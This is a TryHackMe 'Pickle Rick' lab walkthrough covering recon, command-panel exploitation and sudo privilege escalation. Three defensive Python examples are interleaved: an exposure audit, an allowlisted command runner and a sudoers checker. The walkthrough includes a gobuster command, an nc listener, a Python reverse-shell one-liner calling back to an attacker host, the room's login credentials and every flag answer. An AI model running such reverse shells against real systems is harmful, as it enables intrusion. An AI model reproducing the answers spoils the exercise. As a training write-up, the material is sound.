Try Hack Me: Pickle Rick Walkthrough
A Rick and Morty CTF. Help turn Rick back into a human!
Hello!
This is an easy CTF from TryHackMe.
You can find the room at the link below:
I really recommend this challenge to those who are starting out; there is a lot to learn, and I had a lot of fun completing it and writing this text! xD
Task 1 - Pickle Rick
To solve this CTF, we need to follow the usual steps of any penetration test.
Check the list below; I simplified the steps for this specific task into only 3 stages:
- Reconnaissance;
- Exploitation;
- Privilege Escalation.
So…
Let’s walk step by step! xD
Reconnaissance
Look for useful information by following the next steps, and take note of everything you find useful.
Note that not every piece of information is really useful, but I write it here because the process can be helpful in other challenges.
Step 1: Take a look at the source code and see if you find something interesting.
We can see a username: R1ckRul3s
Save it!
Step 2: Always check robots.txt.
We found some interesting text; let's take note of it and see if we can use it later.
Maybe this is some password we can use.
Step 3: Now let’s run a directory bruteforce.
I used gobuster but you can use the tool you prefer.
gobuster dir -u http://<Target IP> -w <path to wordlist>
I chose a small wordlist since this is a simple CTF, but you can use some more complete ones if you like.
We got the directory assets; maybe it can be useful later.
Step 4: Find the login page.
Since we have found a user, there is probably a login page.
I manually tried login.php and it worked.
Now we can try to log in here.
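The two reconnaissance findings above (a username in an HTML comment and a stray string in robots.txt) are exactly the kind of exposure a site owner can scan for before anyone else does. The following is an added example, not code from the room or from the author: a small Python audit that pulls HTML comments, looks for credential-like hints in them, and reviews robots.txt for non-directive text and advertised hidden paths. The sample HTML and robots.txt are constructed for this example (the Disallow line is invented; the username and the Wubbalubbadubdub string are the values the walkthrough itself mentions).

```python
import re

# Constructed sample inputs, modelled on what the room exposes. Not fetched
# from any live target; the "/admin/" path is an invented illustration.
SAMPLE_HTML = """<html><body>
<h1>Help Rick</h1>
<!-- Note to self, remember username! Username: R1ckRul3s -->
<script src="assets/app.js"></script>
</body></html>
"""

SAMPLE_ROBOTS = """User-agent: *
Wubbalubbadubdub
Disallow: /admin/
"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# "username: value", "password=value" and similar hints inside free text
CRED_RE = re.compile(
    r"\b(user(?:name)?|login|pass(?:word)?|pwd|token)\b\s*[:=]\s*(\S+)",
    re.IGNORECASE,
)
ROBOTS_DIRECTIVE_RE = re.compile(
    r"^(user-agent|disallow|allow|sitemap|crawl-delay)\s*:", re.IGNORECASE
)


def html_comments(html: str):
    """Return the text of every HTML comment in the document."""
    return [m.group(1).strip() for m in COMMENT_RE.finditer(html)]


def credential_hints(text: str):
    """Return (kind, value) pairs for credential-like 'key: value' fragments."""
    return [(m.group(1).lower(), m.group(2)) for m in CRED_RE.finditer(text)]


def robots_review(robots: str):
    """Split robots.txt into advertised Disallow paths and stray non-directive lines."""
    disallowed, stray = [], []
    for raw in robots.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ROBOTS_DIRECTIVE_RE.match(line)
        if m is None:
            stray.append(line)  # robots.txt should only hold directives
            continue
        if m.group(1).lower() == "disallow":
            path = line.split(":", 1)[1].strip()
            if path:
                disallowed.append(path)
    return {"disallowed": disallowed, "stray": stray}


def audit_exposure(html: str, robots: str):
    """Combine both checks into a flat list of human-readable findings."""
    findings = []
    for comment in html_comments(html):
        for kind, value in credential_hints(comment):
            findings.append(f"html comment leaks {kind}: {value}")
    review = robots_review(robots)
    for line in review["stray"]:
        findings.append(f"robots.txt contains non-directive text: {line}")
    for path in review["disallowed"]:
        findings.append(f"robots.txt advertises hidden path: {path}")
    return findings


if __name__ == "__main__":
    for finding in audit_exposure(SAMPLE_HTML, SAMPLE_ROBOTS):
        print(finding)
```

Run against a site's own pages before release: anything the audit prints is information an attacker gets for free from the first two steps of this walkthrough, so the fix is to remove the comment or the stray line rather than to rename it.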
Exploitation
Step 5: Log in.
Let’s log in using the credentials we found before.
User: R1ckRul3s
Password: Wubbalubbadubdub
That’s it! We are in!
And it seems like we found something interesting: a command panel that executes shell commands directly through the site.
You can test it by running “ls”.
There is an interesting file, Sup3rS3cretPickl3Ingred.txt, and it seems like one of the ingredients is inside it.
Let’s cat it to see what we find.
Something is filtering some of the commands executed through the site.
To bypass it, we can try to open a reverse shell.
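The panel's weakness is that it forwards user text to a shell and then tries to filter a few command names out of it. As an added example (not the room's code and not the author's), here is the shape of a back end that would not have this problem: the input is tokenised without a shell, only a fixed set of commands with strictly validated arguments is dispatched, and everything else is refused. The allowlist, argument rules and function names are assumptions for this illustration.

```python
import re
import shlex
import subprocess

# Hypothetical hardened "command panel" back end: a fixed allowlist of
# commands, each with an argv prefix and a maximum number of user arguments.
ALLOWED_COMMANDS = {
    "ls": (["ls", "-l"], 1),
    "pwd": (["pwd"], 0),
    "whoami": (["whoami"], 0),
}

# Arguments may only be relative, path-like tokens: no leading "-" (options),
# no leading "/" (absolute paths), no shell metacharacters at all.
SAFE_ARG = re.compile(r"^[A-Za-z0-9_.][A-Za-z0-9_./-]*$")


def plan_command(user_input: str):
    """Map panel input to an argv list, or return None when it is refused.

    Refused: empty input, unbalanced quotes, an unknown command name, too many
    arguments, an argument outside SAFE_ARG, or a ".." path segment.
    Because the input is split with shlex and never handed to a shell,
    "ls; id" becomes the unknown command "ls;" rather than two commands.
    """
    try:
        tokens = shlex.split(user_input)
    except ValueError:
        return None
    if not tokens:
        return None
    name, args = tokens[0], tokens[1:]
    if name not in ALLOWED_COMMANDS:
        return None
    argv_prefix, max_args = ALLOWED_COMMANDS[name]
    if len(args) > max_args:
        return None
    for arg in args:
        if not SAFE_ARG.match(arg) or ".." in arg.split("/"):
            return None
    return argv_prefix + args


def run_command(user_input: str):
    """Execute an allowlisted command without a shell; return (rc, output)."""
    argv = plan_command(user_input)
    if argv is None:
        return (None, "command not permitted")
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return (proc.returncode, proc.stdout + proc.stderr)


if __name__ == "__main__":
    for cmd in ["ls", "ls .", "pwd", "cat Sup3rS3cretPickl3Ingred.txt",
                "ls; id", "ls ../..", "ls -la"]:
        print(repr(cmd), "->", plan_command(cmd))
```

The point of the contrast: a denylist has to anticipate every way a shell can be asked to run something, while the allowlist only has to describe the handful of things the panel is meant to do. If the panel were ever rebuilt, this is the direction to take rather than adding more words to the filter.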
Step 6: Open a reverse shell with the command panel.
First we need to configure the server side that will receive the connection; in this case, that is our machine.
To do it, use netcat to listen on port 1234.
nc -lvnp 1234
On the client side (the browser), which will connect to our machine, there are a lot of reverse shell scripts to choose from.
Take a look at the link below for some reverse shell script options to run in the command panel:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
I used the Python script:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Your IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Remember to change "python" in the cheat sheet's version to "python3".
We got it! Connection received.
Step 7: Cat the file.
Now we can cat the file and see the first ingredient.
cat Sup3rS3cretPickl3Ingred.txt
We got the first one!
1.1 — What is the first ingredient Rick needs?
Answer: mr. meeseek hair
Step 8: Look for another user.
Just walk around and see if you find a directory where the ingredients might be.
You will find a directory belonging to rick with the second ingredient.
Step 9: Cat it and find the second ingredient.
1.2 — What’s the second ingredient Rick needs?
Answer: 1 jerry tear
Privilege Escalation
It's time to escalate privileges and see if we can find the last ingredient as root.
Step 10: See the sudo permissions for the current user.
sudo -l
It seems that we have unlimited power using sudo. hehe
So we can become root with sudo.
Step 11: Run “sudo su” and become root.
sudo su
Now we are root! xD
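What made steps 10 and 11 trivial was a sudoers rule that lets the web server's user run anything as anyone without a password. As an added example (not the room's output and not the author's code), here is a small Python checker that parses the rule section of sudo -l output and grades each rule, so an administrator can spot an unrestricted grant before a pentester does. The sample output below is constructed to have the shape described in the walkthrough; the second rule and the host name are invented for contrast.

```python
import re

# Constructed sample of `sudo -l` output for a web-server user. Not captured
# from the real box; the host name and the second rule are invented.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on pickle-rick:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on pickle-rick:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

# One rule line: "(runas[ : rungroup]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)
RULES_HEADER_RE = re.compile(r"^User \S+ may run the following commands")


def parse_sudo_rules(text: str):
    """Return the rules listed after the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if RULES_HEADER_RE.match(line):
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        runas = m.group("runas").split(":")[0].strip()
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        commands = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"runas": runas, "tags": tags, "commands": commands})
    return rules


def assess_rules(rules):
    """Grade each rule: ALL is critical, NOPASSWD on a fixed command is medium."""
    findings = []
    for rule in rules:
        for cmd in rule["commands"]:
            if cmd == "ALL":
                severity = "critical"
                note = f"any command as {rule['runas']}"
            elif "NOPASSWD" in rule["tags"]:
                severity = "medium"
                note = f"{cmd} as {rule['runas']} without a password"
            else:
                severity = "low"
                note = f"{cmd} as {rule['runas']}"
            if "NOPASSWD" in rule["tags"] and severity == "critical":
                note += ", no password required"
            findings.append({"severity": severity, "note": note})
    return findings


SEVERITY_ORDER = {"low": 0, "medium": 1, "critical": 2}


def highest_severity(findings):
    """Return the worst severity present, or None when there are no rules."""
    if not findings:
        return None
    return max((f["severity"] for f in findings), key=SEVERITY_ORDER.__getitem__)


if __name__ == "__main__":
    for finding in assess_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        print(f"[{finding['severity']}] {finding['note']}")
```

A web-server account normally needs no sudo rights at all; if a rule is genuinely required, it should name one fixed command with its arguments, as the second sample rule does, so that a compromise of the site does not immediately become root.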
Step 12: Take a look at the root directory.
Step 13: Cat 3rd.txt
And we got the last ingredient!
1.3 — What’s the final ingredient Rick needs?
Answer: fleeb juice
That’s it! xD
Thanks for your attention.
I hope this simple walkthrough can be helpful to you in some way.
If you see some error or have any other tips, let me know! =D
Bye!